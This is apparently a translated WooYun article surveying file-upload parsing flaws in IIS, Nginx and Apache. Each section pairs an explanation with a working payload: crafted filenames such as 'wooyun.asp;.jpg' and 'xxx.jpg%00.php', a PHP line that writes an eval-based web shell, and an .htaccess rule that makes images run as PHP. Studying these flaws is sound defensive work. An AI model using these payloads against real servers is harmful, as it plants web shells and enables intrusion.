Original address: http://drops.wooyun.org/papers/539
1. IIS 5.x/6.0 parsing vulnerability
There are two ways to analyze and utilize IIS 6.0
1. Directory parsing
/xx.asp/xx.jpg
2. File parsing
wooyun.asp;.jpg
The first is to create a folder named .asp and .asa under the website, and any file with an extension in the directory will be parsed and executed by IIS as an asp file.
For example, create a directory wooyun.asp, then
/wooyun.asp/1.jpg
Will be executed as an asp file. Assuming that Heiko can control the upload folder path, you can get the shell regardless of whether your image is renamed or not after uploading.
The second, under IIS6.0, the semicolon is not parsed, that is to say
wooyun.asp;.jpg
Will be seen by the server as wooyun.asp
There are also IIS6.0 default executable files that include these three in addition to asp
/wooyun.asa
/wooyun.cer
/wooyun.cdx
IIS 6.0 Parsing Vulnerability Exploit Case on Dark Cloud
http://www.wooyun.org/searchbug.php?q=IIS6.0
2. IIS 7.0/IIS 7.5/ Nginx <8.03 Malformed Parsing Vulnerability
Nginx parsing vulnerability This great vulnerability was discovered by my country's security organization 80sec...
When Fast-CGI is enabled by default, Heiko uploads a file named wooyun.jpg with the content of
<?PHP fputs(fopen('shell.php','w'),'<?php eval($_POST[cmd])?>');?>
file, and then access wooyun.jpg/.php, a sentence Trojan shell.php will be generated in this directory
This bug case
WooYun: SQL injection vulnerability + nginx parsing vulnerability in a substation of UF software
WooYun: Kingsoft.com X-level domain name nginx parsing vulnerability + explosion path
3. Nginx <8.03 Null Byte Code Execution Vulnerability
Impact version: 0.5. , 0.6. , 0.7 <= 0.7.65, 0.8 <= 0.8.37
Nginx embeds PHP code in the image and then accesses it through
xxx.jpg%00.php
to execute the code
Nginx Null Byte Generation Execution Vulnerability Case
http://www.wooyun.org/searchbug.php?q=%2500.php
4. Apache parsing vulnerability
Apache judges the parsing from right to left, and if it is unrecognized parsing, it judges to the left.
For example, wooyun.php.owf.rar ".owf" and ".rar" are two suffixes that are not recognized by apache, and apache will parse wooyun.php.owf.rar into php.
How to judge whether it is a legal suffix is the key to the exploitation of this vulnerability. When testing, you can try to upload a wooyun.php.rara.jpg.png... (write all the common suffixes you know...) to test whether it is a legal suffix
Apache parsing vulnerability case
http://www.wooyun.org/searchbug.php?q=apache%E8%A7%A3%E6%9E%90
5. Others
In the Windows environment, xx.jpg[space] or xx.jpg. These two types of files are not allowed to exist. If they are named in this way, Windows will remove spaces or dots by default. Hackers can capture packets and add files after the file name. A space or dot bypasses the blacklist. If the upload is successful, the spaces and dots will be automatically eliminated by Windows, so you can also getshell.
If .htaccess can be executed in Apache. And can be uploaded. Then try to write in .htaccess:
<FilesMatch "wooyun.jpg"> SetHandler application/x-httpd-php </FilesMatch>
Then upload the Trojan horse of shell.jpg, so that shell.jpg can be parsed as a php file.